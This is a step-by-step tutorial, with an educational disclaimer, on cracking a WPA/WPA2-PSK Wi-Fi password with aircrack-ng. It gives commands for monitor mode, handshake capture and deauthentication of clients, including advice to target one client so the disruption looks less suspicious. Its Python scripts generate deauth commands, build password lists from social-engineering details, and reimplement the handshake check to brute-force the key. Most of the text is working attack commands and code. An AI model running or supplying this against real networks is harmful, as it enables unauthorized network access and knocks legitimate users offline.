In this article, I am going to show you how to recover a Wi-Fi password with Aircrack-ng.
NOTE: This article is presented for educational purposes only; our goal is to improve your knowledge of network security. Any illegal use is the sole responsibility of the user, and the author accepts no responsibility for it.
In this tutorial, we will show you how to obtain the password of a wireless network. Our goal is only to secure our own wireless networks and those of the organization we work for.
The most important factor in the security of a WPA/WPA2-PSK wireless network is its password (the pre-shared key). Whatever tool is used, an attacker ultimately has to recover that key, so the single most effective defence is a long, random passphrase. Of course, hacking tools are not the only route: social engineering can be used instead of, or together with, a technical attack. You will see this come up again when we build the password list in the final stage.
- Analyze the wireless networks around you
- Disconnect (deauthenticate) clients from a wireless network
- Capture data in transit (wireless eavesdropping)
- Crack the password of a wireless network
- A Linux operating system (Debian-based: Kali Linux, Ubuntu, ...)
- A wireless network card that supports monitor mode
- Internet access to install the necessary packages (Kali Linux and Parrot OS ship them preinstalled, so no Internet access is needed there)
- Basic knowledge of Linux
First you need a Debian-based Linux system; on Kali Linux or Parrot OS you do not need Internet access. To analyze the networks around you, you need a network card that supports monitor mode (I explain below how to find out whether yours does), and finally a little Linux knowledge (just enough to follow the commands).
NOTE: If you are working in a virtual machine, the wireless adapter must be passed through to the guest as a physical USB device; the virtual network adapter the hypervisor provides cannot be put into monitor mode. Look for the USB or device passthrough setting of your hypervisor, and search the web if you cannot find it.
NOTE: If a command from these steps fails with an error on your system, consult the troubleshooting resources for your operating system.
-
NOTE: If you are using Kali Linux or Parrot OS, or the necessary packages are already installed, skip this step.
NOTE: I am using Ubuntu 20.04. If the package installation instructions do not work for you, look up the equivalent instructions for your distribution.
Log in as the root user with the following command:
$ sudo -i
Install the aircrack-ng package:
# apt update
# apt install -y aircrack-ng
If this step completes without errors, you can go on to the next step.
-
Connect your wireless network card to the machine (if it is not built in), then list the network interfaces with the iwconfig command:
root@ubuntu:~# iwconfig
lo        no wireless extensions.

eno1      no wireless extensions.

wlp3s0    IEEE 802.11  Mode:Master  Tx-Power=15 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on
Interfaces whose names start with w are wireless cards (virtual interfaces, however, can be named anything). For example, my wireless card is named wlp3s0. Remember this name; we will use it constantly from here on. At the moment my card is in Master mode (yours may show another mode, such as Managed). To continue, the card has to be put into Monitor mode:
# airmon-ng start [NETWORK-CARD-NAME]
Replace [NETWORK-CARD-NAME] with the name of your network card. After this command runs, the interface name may change (on my machine wlp3s0 became wlp3s0mon), so run iwconfig again and note the new name.
NOTE: If iwconfig still does not show Mode:Monitor, first check the processes airmon-ng warns about when it starts (NetworkManager and wpa_supplicant will keep resetting the interface); if stopping them does not help, your card or its driver does not support monitor mode.
-
Use the following command to analyze nearby wireless networks:
# airodump-ng [NETWORK-CARD-NAME]
The output will look like this:
 CH  1 ][ Elapsed: 6 s ][ 2023-03-17 11:58

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 78:C3:E9:EB:AB:BE  -21       33        0    0  11   65   WPA2 CCMP   PSK  MJscript
 18:A6:F7:62:2C:67  -70       21        2    0   6  130   WPA2 CCMP   PSK  <length:  0>

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 D8:47:32:86:33:E8  86:40:4C:FE:A1:CB  -55    0e- 0e     0      283
 18:A6:F7:62:2C:67  EA:AA:AC:9E:22:C1  -68    0 - 0e     2        4
The first table lists the wireless networks and the second the clients connected to them. We only need a few columns of the first table:
- BSSID: MAC address of the access point
- ESSID: the display name of the network (if the value is <length: 0>, the name is hidden; it is revealed once we capture a client joining that network)
- CH: the channel the network operates on
Our target is the MJscript network. To examine it more closely and record its traffic, we narrow the capture to that one network:
# airodump-ng -c [WIFI-CHANNEL] -d [WIFI-BSSID] -w [OUTPUT-PATH] [NETWORK-CARD-NAME]
Replace [WIFI-CHANNEL] with the value of the CH column, [WIFI-BSSID] with the value of the BSSID column, and [OUTPUT-PATH] with the desired output prefix (airodump-ng appends -01.cap and related files to it). For example, this is what it looked like for me:
root@ubuntu:~# airodump-ng -c 11 -d 78:C3:E9:EB:AB:BE -w /home/ubuntu/wifi wlp3s0mon

 CH 11 ][ Elapsed: 6 s ][ 2023-03-17 12:36

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 78:C3:E9:EB:AB:BE  -20 100       81       95   38  11   65   WPA2 CCMP   PSK  MJscript

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 78:C3:E9:EB:AB:BE  64:66:B3:1E:5B:A7  -38    0e-24   3123     106
These are the same two tables as before, except that they now cover only one network and the captured frames are being written to the prefix we gave.
At this point traffic on the network is being recorded, but ordinary data frames do not let us recover the password: the clients already connected have finished authenticating. What aircrack-ng needs is the WPA 4-way handshake, the EAPOL exchange performed every time a client authenticates to the access point. We could wait for a legitimate client to connect on its own, but that may take a long time, so we force one to reconnect: with our adapter we send deauthentication frames telling the client it has been disconnected, and when it rejoins it performs the handshake again.
NOTE: Deauthentication frames are unauthenticated in WPA2 unless the network enforces Protected Management Frames (802.11w). If your target has PMF enabled, this trick does not work, which is one more setting worth turning on in your own network.
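As an added example (my code, not part of the original tutorial), the same information can be read from the CSV that airodump-ng writes next to the .cap file when -w is used (here wifi-01.csv). The rows below are constructed from the tables above with made-up timestamps; the parser picks the target by name, flags hidden networks and lists the clients associated with each access point, then fills in the focused-capture and targeted-deauth commands used in this tutorial:

```python
import csv
import io
from dataclasses import dataclass, field

# Constructed sample in the layout airodump-ng writes to <prefix>-01.csv with -w.
# Values come from the tutorial's terminal tables; the timestamps are made up.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
78:C3:E9:EB:AB:BE, 2023-03-17 11:58:01, 2023-03-17 11:58:07, 11, 65, WPA2, CCMP, PSK, -21, 33, 0, 0.  0.  0.  0, 8, MJscript,
18:A6:F7:62:2C:67, 2023-03-17 11:58:01, 2023-03-17 11:58:07, 6, 130, WPA2, CCMP, PSK, -70, 21, 2, 0.  0.  0.  0, 0, ,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
86:40:4C:FE:A1:CB, 2023-03-17 11:58:01, 2023-03-17 11:58:07, -55, 283, D8:47:32:86:33:E8,
EA:AA:AC:9E:22:C1, 2023-03-17 11:58:01, 2023-03-17 11:58:07, -68, 4, 18:A6:F7:62:2C:67,
64:66:B3:1E:5B:A7, 2023-03-17 12:36:01, 2023-03-17 12:36:07, -38, 106, 78:C3:E9:EB:AB:BE,
"""


@dataclass
class AccessPoint:
    bssid: str
    channel: int
    privacy: str
    cipher: str
    auth: str
    power: int
    essid: str                      # "" when the name is hidden (ID-length 0)
    clients: list = field(default_factory=list)

    @property
    def hidden(self) -> bool:
        return self.essid == ""


def parse_airodump_csv(text: str) -> dict:
    """Return {bssid: AccessPoint} with associated stations attached.

    The file has two comma-separated sections divided by a blank line: access
    points first, then stations. An ESSID containing a comma would confuse this
    simple reader, which is acceptable for a triage script.
    """
    ap_section, _, sta_section = text.partition("\n\n")
    aps = {}
    for row in csv.reader(io.StringIO(ap_section), skipinitialspace=True):
        if len(row) < 14 or row[0] == "BSSID":
            continue
        aps[row[0]] = AccessPoint(
            bssid=row[0], channel=int(row[3]), privacy=row[5], cipher=row[6],
            auth=row[7], power=int(row[8]), essid=row[13],
        )
    for row in csv.reader(io.StringIO(sta_section), skipinitialspace=True):
        if len(row) < 6 or row[0] == "Station MAC":
            continue
        station, bssid = row[0], row[5]
        if bssid in aps:                 # "(not associated)" and unseen APs are skipped
            aps[bssid].clients.append(station)
    return aps


def find_target(aps: dict, essid: str):
    """Pick the access point to focus on by its display name (None if absent)."""
    return next((ap for ap in aps.values() if ap.essid == essid), None)


def focused_capture_command(ap: AccessPoint, iface: str, prefix: str) -> str:
    """The tutorial's second airodump-ng invocation, filled in from the parsed row."""
    return f"airodump-ng -c {ap.channel} -d {ap.bssid} -w {prefix} {iface}"


def deauth_commands(ap: AccessPoint, iface: str, count: int = 5) -> list:
    """One targeted aireplay-ng deauth per associated client, with a finite frame count."""
    return [f"aireplay-ng --deauth {count} -a {ap.bssid} -c {sta} {iface}" for sta in ap.clients]


if __name__ == "__main__":
    aps = parse_airodump_csv(SAMPLE_CSV)
    for ap in aps.values():
        name = "<hidden>" if ap.hidden else ap.essid
        print(f"{ap.bssid} ch{ap.channel:<3} {ap.privacy}/{ap.cipher}/{ap.auth} {name} clients={ap.clients}")
    target = find_target(aps, "MJscript")
    print(focused_capture_command(target, "wlp3s0mon", "/home/ubuntu/wifi"))
    print("\n".join(deauth_commands(target, "wlp3s0mon")))
```

Point it at your own prefix-01.csv instead of SAMPLE_CSV and it gives you the channel, BSSID and client list for the next two steps without retyping MAC addresses from the screen.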
NOTE: Leave the terminal running the capture command open; stop that process only once the handshake has been captured.
Next, open a new terminal and enter the following commands there.
Use the following command to send deauthentication frames to every client on the network:
# aireplay-ng --deauth 0 -a [WIFI-BSSID] [NETWORK-CARD-NAME]
With the count set to 0, an unlimited number of deauthentication frames is sent to all clients of that network.
But one question: isn't it suspicious when every client on a network is disconnected at once? We can instead target a single client, using its MAC address from the STATION column of the second table; the following command deauthenticates only that client:
# aireplay-ng --deauth 0 -a [WIFI-BSSID] -c [CLIENT-STATION] [NETWORK-CARD-NAME]
Replace [CLIENT-STATION] with the client's MAC address.
NOTE: The count 0 means an unlimited number of frames; you can replace it with any number you want (a handful is usually enough).
After a few frames have been sent, you can stop the process.
A few seconds after stopping it, the first line in the first terminal changes to:
CH 11 ][ Elapsed: 12 s ][ 2023-03-17 13:42 ][ WPA handshake: 78:C3:E9:EB:AB:BE
The value WPA handshake: 78:C3:E9:EB:AB:BE has been appended to the line. It means a handshake for the 78:C3:E9:EB:AB:BE network was captured (you will, of course, see your own target's BSSID here). Now that we have the handshake, you can stop the capture process as well.
-
Before you brute-force, you need a file containing the passwords to try.
In the introduction I mentioned that social engineering can be part of this attack. Even if it does not hand you the password outright, the information you gather (network name, organization, names, dates) lets you build a targeted password list for that network, which greatly improves the odds that the password is in it.
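To make that concrete, here is an added example (my code, not from the tutorial) that turns gathered facts into candidates. Only the network name MJscript comes from the tables above; the other seeds, the year range and the suffixes are assumptions you would replace with what you actually learned. Every candidate is kept within WPA's 8 to 63 character limit so no impossible passphrase is ever tested:

```python
import itertools
import sys

WPA_MIN_LEN, WPA_MAX_LEN = 8, 63          # WPA/WPA2 passphrase length limits

# Assumed seeds: the network name from the airodump-ng table above plus made-up
# organisation and place names standing in for what social engineering would yield.
SEEDS = ["MJscript", "office", "Springfield"]

LEET = str.maketrans({"a": "4", "e": "3", "i": "1", "o": "0", "s": "5"})


def base_words(seeds):
    """Seeds, ordered pairs of seeds, their case variants and a simple leet form."""
    words = list(seeds) + ["".join(p) for p in itertools.permutations(seeds, 2)]
    out = []
    for w in words:
        for v in (w, w.lower(), w.upper(), w.capitalize()):
            out.append(v)
            out.append(v.translate(LEET))
    return out


def build_wordlist(seeds, years=range(2015, 2026), suffixes=("", "!", "#", "123", "1234")):
    """Yield unique candidates of the form base + year + suffix that WPA would accept.

    Anything shorter than 8 or longer than 63 characters cannot be a WPA
    passphrase, so it is dropped before it would cost a PBKDF2 computation.
    """
    tails = [""] + [str(y) for y in years] + [str(y)[-2:] for y in years]
    seen = set()
    for base in base_words(seeds):
        for tail, suffix in itertools.product(tails, suffixes):
            candidate = f"{base}{tail}{suffix}"
            if WPA_MIN_LEN <= len(candidate) <= WPA_MAX_LEN and candidate not in seen:
                seen.add(candidate)
                yield candidate


def write_wordlist(path, seeds):
    """Write one candidate per line, the format aircrack-ng -w reads; returns the count."""
    n = 0
    with open(path, "w", encoding="utf-8") as fh:
        for candidate in build_wordlist(seeds):
            fh.write(candidate + "\n")
            n += 1
    return n


if __name__ == "__main__":
    # usage: python wordlist.py /home/ubuntu/passlist [seed ...]
    path = sys.argv[1] if len(sys.argv) > 1 else "passlist"
    seeds = sys.argv[2:] or SEEDS
    print(f"{write_wordlist(path, seeds)} candidates written to {path}")
```

The resulting file is a few thousand lines, which aircrack-ng tests in seconds; compare that with the exhaustive approach in the next section.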
If you do not have a password list and want one that covers all keyboard characters, you can generate it with crunch:
NOTE: crunch may not be installed; install it with apt install crunch.
# crunch [MIN-SIZE] [MAX-SIZE] "[CHARACTERS]" > [OUTPUT-FILE]
Replace [MIN-SIZE] with the minimum password length, [MAX-SIZE] with the maximum, [CHARACTERS] with the characters the password may contain, and [OUTPUT-FILE] with the path where the list is stored.
NOTE: A WPA/WPA2 passphrase is between 8 and 63 characters long, so set [MIN-SIZE] to at least 8. Be realistic about the size: every 8-character combination of the 95 printable ASCII characters is about 6.6 x 10^15 candidates, far beyond what a CPU can test with aircrack-ng, which is why a targeted list matters far more than an exhaustive one.
Once you have a password list, you can crack the password with the following command:
# aircrack-ng [CAP-FILE] -w [PASSLIST-FILE]
Replace [CAP-FILE] with the .cap file written by the capture step and [PASSLIST-FILE] with the path of the password list. If the password is found, you will see output like this:
root@ubuntu:~# aircrack-ng /home/ubuntu/wifi-01.cap -w /home/ubuntu/passlist

                               Aircrack-ng 1.6

      [00:00:00] 2/2 keys tested (22.82 k/s)

      Time left: --

                          KEY FOUND! [ 1234567890# ]

      Master Key     : B9 1B C6 AE 10 59 44 4A 4E CB EC D9 36 A3 79 86
                       DE F8 EB CE 93 0B 22 D1 97 43 4F B5 FC C5 A5 B2

      Transient Key  : AD 7D 3D 82 1A D2 CE 37 08 43 E9 4C 94 75 36 D7
                       67 7D 48 A6 5F 70 77 CE 83 C9 63 BE C3 61 FC A7
                       75 98 EB 09 B6 C1 B7 58 0F B6 0E 69 6F 81 60 5D
                       29 FC 1C E6 35 B3 BF 77 2D 59 6C BF 50 6D 4A 85

      EAPOL HMAC     : D4 BB C7 04 C7 C8 61 11 14 8B 3D 03 3B 04 28 E4
After all these steps, we finally have the Wi-Fi password.
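What aircrack-ng actually does with the capture and the word list, as an added example that is not part of the original tutorial: for each candidate it derives the PMK (the Master Key in the output above) with PBKDF2, derives the KCK from the PMK together with the MACs and nonces of the handshake, and compares the MIC it computes on handshake message 2 with the one the client sent (the EAPOL HMAC above). The handshake below is constructed for offline use: the SSID, MACs and passphrase are the ones from this tutorial, while the nonces and the EAPOL frame are made up. The IEEE 802.11i test vector (passphrase "password", SSID "IEEE") checks the PMK derivation.

```python
import hashlib
import hmac
from dataclasses import dataclass

# Offsets inside an EAPOL-Key frame: 4-byte EAPOL header, then Descriptor Type (1),
# Key Information (2), Key Length (2), Replay Counter (8) before the 32-byte nonce,
# and Key IV (16), Key RSC (8), Key ID (8) before the 16-byte MIC.
NONCE_OFFSET = 4 + 1 + 2 + 2 + 8             # 17
MIC_OFFSET = NONCE_OFFSET + 32 + 16 + 8 + 8   # 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    # The 4096 iterations make every guess cost something; the SSID as salt is why
    # tables precomputed for one network name do not help against another.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_kck(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PRF-384 "Pairwise key expansion" over the sorted MACs and nonces yields the PTK
    # (KCK | KEK | TK); only the first 16 bytes, the KCK, are needed to check a MIC.
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(3)
    )
    return ptk[:16]


def eapol_mic(kck: bytes, frame: bytes, key_descriptor_version: int = 2) -> bytes:
    # The MIC covers the whole EAPOL-Key frame with its own MIC field zeroed.
    # Version 1 (WPA/TKIP) uses HMAC-MD5; version 2 (WPA2/CCMP) HMAC-SHA1 cut to 16 bytes.
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    digest = hashlib.md5 if key_descriptor_version == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, digest).digest()[:16]


@dataclass(frozen=True)
class Handshake:
    ssid: str
    ap_mac: bytes
    sta_mac: bytes
    anonce: bytes        # from message 1 (AP -> client)
    eapol_msg2: bytes    # message 2 (client -> AP): carries SNonce and the first MIC

    @property
    def snonce(self) -> bytes:
        return self.eapol_msg2[NONCE_OFFSET:NONCE_OFFSET + 32]

    @property
    def mic(self) -> bytes:
        return self.eapol_msg2[MIC_OFFSET:MIC_OFFSET + 16]


def passphrase_matches(hs: Handshake, passphrase: str) -> bool:
    pmk = pmk_from_passphrase(passphrase, hs.ssid)
    kck = derive_kck(pmk, hs.ap_mac, hs.sta_mac, hs.anonce, hs.snonce)
    return hmac.compare_digest(eapol_mic(kck, hs.eapol_msg2), hs.mic)


def crack(hs: Handshake, wordlist):
    # The loop aircrack-ng runs over the word list: one PBKDF2 plus a few HMACs per candidate.
    for candidate in wordlist:
        if 8 <= len(candidate) <= 63 and passphrase_matches(hs, candidate):
            return candidate
    return None


def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    # Minimal WPA2 message 2 with empty Key Data, constructed for this example.
    body = (
        b"\x02"                        # Descriptor Type: RSN
        + (0x010A).to_bytes(2, "big")  # Key Information: version 2, Pairwise, MIC set
        + (0).to_bytes(2, "big")       # Key Length (0 in message 2)
        + (1).to_bytes(8, "big")       # Replay Counter
        + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # Nonce, IV, RSC, ID
        + mic
        + (0).to_bytes(2, "big")       # Key Data Length
    )
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v1, type 3 = Key


def make_sample_handshake(passphrase: str = "1234567890#") -> Handshake:
    # Constructed stand-in for the handshake airodump-ng saved to wifi-01.cap: SSID and MACs
    # are the tutorial's, nonces are made up, and the MIC is computed from the known passphrase.
    ssid, ap_mac, sta_mac = "MJscript", bytes.fromhex("78C3E9EBABBE"), bytes.fromhex("6466B31E5BA7")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    kck = derive_kck(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    mic = eapol_mic(kck, build_eapol_msg2(snonce))
    return Handshake(ssid, ap_mac, sta_mac, anonce, build_eapol_msg2(snonce, mic))


if __name__ == "__main__":
    print(crack(make_sample_handshake(), ["password", "MJscript2023", "1234567890#"]))
```

Two things this makes visible that the aircrack-ng screen does not: the per-guess cost is fixed by PBKDF2's 4096 iterations (so the only defence that scales is passphrase entropy), and because the MAC addresses and nonces are part of the derivation, a captured handshake can only be replayed against guesses offline, never used to connect without the passphrase.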
-
Enter the following command to take the card out of monitor mode:
# airmon-ng stop [NETWORK-CARD-NAME]
Together we have recovered a wireless network password offline with a dictionary (brute-force) attack. My purpose in this tutorial is only to raise your level of knowledge, and I hope you heed the warnings and do not cause trouble :)